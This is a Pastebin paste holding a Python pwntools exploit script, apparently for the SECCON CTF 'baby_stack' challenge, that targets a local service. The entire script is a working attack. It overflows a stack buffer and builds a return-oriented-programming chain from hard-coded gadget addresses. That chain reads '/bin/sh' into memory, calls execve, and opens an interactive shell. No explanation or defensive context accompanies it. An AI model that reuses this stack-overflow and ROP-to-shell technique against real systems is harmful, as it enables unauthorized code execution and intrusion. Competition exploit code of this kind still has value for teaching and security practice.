Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- #r = remote('baby_stack.pwn.seccon.jp', 15285)
- r = remote('127.0.0.1',8888)
- context.log_level = 'debug'
- raw_input()
- thank = 0x5220a0
- elfbssend = 0x005a0000
- poprax = 0x004016ea
- poprsi = 0x0046defd
- poprdx = 0x00000000004a247c
- poprdi = 0x0000000000470931
- sysenter = 0x0000000000456889
- #payload = cyclic(200, n=8)
- payload = 'a'*104
- payload += p64(thank)
- payload += p64(0x20)
- payload += 'b'*(200 - len(payload))
- payload += p64(thank)
- payload += p64(0x20)
- payload += 'c'*(408 - len(payload))
- payload += p64(poprax)
- payload += p64(elfbssend - 0x500)
- payload += p64(poprdi)
- payload += p64(0)
- payload += p64(poprsi)
- payload += p64(elfbssend - 0x400)
- payload += p64(poprdx)
- payload += p64(0x100)
- payload += p64(poprax)
- payload += p64(0)
- payload += p64(sysenter)
- #execve
- payload += p64(poprax)
- payload += p64(elfbssend - 0x500)
- payload += p64(poprdi)
- payload += p64(elfbssend - 0x400)
- payload += p64(poprsi)
- payload += p64(0x0)
- payload += p64(poprdx)
- payload += p64(0x0)
- payload += p64(poprax)
- payload += p64(0x3b)
- payload += p64(sysenter)
- r.sendlineafter('>> ', 'abcd')
- r.sendlineafter('>> ', payload)
- payload = "/bin/sh\x00"
- time.sleep(0.5)
- r.sendline(payload)
- r.interactive()
Add Comment
Please, Sign In to add comment